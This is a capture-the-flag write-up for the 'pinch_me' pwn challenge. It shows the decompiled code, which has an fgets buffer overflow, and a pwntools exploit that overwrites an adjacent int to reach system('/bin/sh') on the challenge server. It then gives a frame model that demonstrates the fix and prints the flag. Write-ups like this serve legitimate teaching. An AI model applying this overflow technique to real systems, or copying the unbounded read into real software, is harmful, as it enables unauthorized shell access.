Tags: pwn
Rating:
Preface
-------
We got a binary file which asks us `Am I dreaming?` and, given any ordinary input, prints `Pinch me!`.
Overview
--------
Loading the binary into *ghidra* we can see that the interaction happens in the function `vuln`:
```c
#include <stdio.h>
#include <stdlib.h>

void vuln(void)
{
    char local_28 [24];          /* 24-byte buffer, directly below the two ints */
    int local_10;
    int local_c;

    local_c = 0x1234567;
    local_10 = -0x76543211;
    puts("Is this a real life, or is it just a fanta sea?");
    puts("Am I dreaming?");
    fgets(local_28,100,stdin);   /* reads up to 99 bytes into a 24-byte buffer */
    if (local_10 == 0x1337c0de) {
        system("/bin/sh");
    }
    else {
        if (local_c == 0x1234567) {
            puts("Pinch me!");
        }
        else {
            puts("Pinch me harder!");
        }
    }
    return;
}
```
Based on this, overwriting the `local_10` variable (the one compared against `0x1337c0de`) with `0x1337c0de` gives me a shell: `local_28` is only 24 bytes, but `fgets` accepts up to 99, so the input runs straight into the ints above the buffer.
This was pretty easy, I only needed to be careful to use the correct endianness.
Pwntools provides a function (`p64`) to pack the value correctly.
My final exploit was:
```python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './pinch_me'
#p = process( vulnerable )
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)

p.recvuntil(b'Am I dreaming?')
# 24 bytes fill local_28, then the little-endian packed value lands on local_10
p.sendline(b'\x41'*24 + p64(0x1337c0de))
#p.recvuntil(b'will this work')
p.recv(2048, timeout=1)  # cleanup output
p.interactive()
```
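To see exactly where the 8-byte packed value lands, here is a small model of the `vuln` frame, added for this writeup and not part of the original exploit; it emulates the `fgets` semantics instead of running the binary and also shows the fix, a read bounded by the buffer size. The offsets are inferred from Ghidra's local names (`local_28` at -0x28, `local_10` at -0x10, `local_c` at -0xc from the frame base), which is an assumption about the layout.

```python
#!/usr/bin/env python3
"""Constructed model of vuln()'s stack frame, built from the Ghidra local names.
Offsets are relative to the frame base: local_28 -> -0x28, local_10 -> -0x10,
local_c -> -0xc (inferred from the names; a model, not the binary itself)."""
import struct

FRAME = 0x28                 # bytes from local_28 up to the frame base
BUF_OFF = FRAME - 0x28       # char local_28[24] starts at index 0
LOCAL_10_OFF = FRAME - 0x10  # int local_10 at index 24
LOCAL_C_OFF = FRAME - 0x0c   # int local_c  at index 28
FGETS_SIZE = 100             # the size argument the binary passes to fgets


def simulate_vuln(line: bytes, fgets_size: int = FGETS_SIZE) -> dict:
    """Apply fgets(local_28, fgets_size, stdin) to the model frame and report
    what each local ends up holding and which branch vuln() would take."""
    frame = bytearray(FRAME)
    struct.pack_into('<i', frame, LOCAL_10_OFF, -0x76543211)   # initial values
    struct.pack_into('<I', frame, LOCAL_C_OFF, 0x1234567)      # from the decompile
    # fgets reads at most size-1 bytes, stops after a newline, then appends NUL
    data = line[:fgets_size - 1]
    nl = data.find(b'\n')
    if nl != -1:
        data = data[:nl + 1]
    data += b'\0'
    # anything past the frame would hit saved rbp / return address in the real
    # binary; the model drops it, since the challenge only needs the adjacent int
    n = min(len(data), FRAME)
    frame[BUF_OFF:BUF_OFF + n] = data[:n]
    local_10 = struct.unpack_from('<I', frame, LOCAL_10_OFF)[0]
    local_c = struct.unpack_from('<I', frame, LOCAL_C_OFF)[0]
    if local_10 == 0x1337c0de:
        branch = 'system("/bin/sh")'
    elif local_c == 0x1234567:
        branch = 'Pinch me!'
    else:
        branch = 'Pinch me harder!'
    return {'local_10': local_10, 'local_c': local_c, 'branch': branch}


def writeup_payload() -> bytes:
    """24 filler bytes, then 0x1337c0de packed little-endian; p64 writes 8 bytes,
    so the zero upper half of the qword spills into local_c (sendline adds '\\n')."""
    return b'A' * 24 + struct.pack('<Q', 0x1337c0de) + b'\n'


if __name__ == '__main__':
    print('binary as shipped:', simulate_vuln(writeup_payload()))
    # the fix: bound the read by the buffer size so local_10 cannot be reached
    print('fgets(buf, sizeof buf):', simulate_vuln(writeup_payload(), fgets_size=24))
```

With the bounded read the same input is cut at 23 bytes, `local_10` keeps its initial value and the program prints `Pinch me!`.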
Then I just needed to print the file `flag.txt`.
The flag was:
`dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}`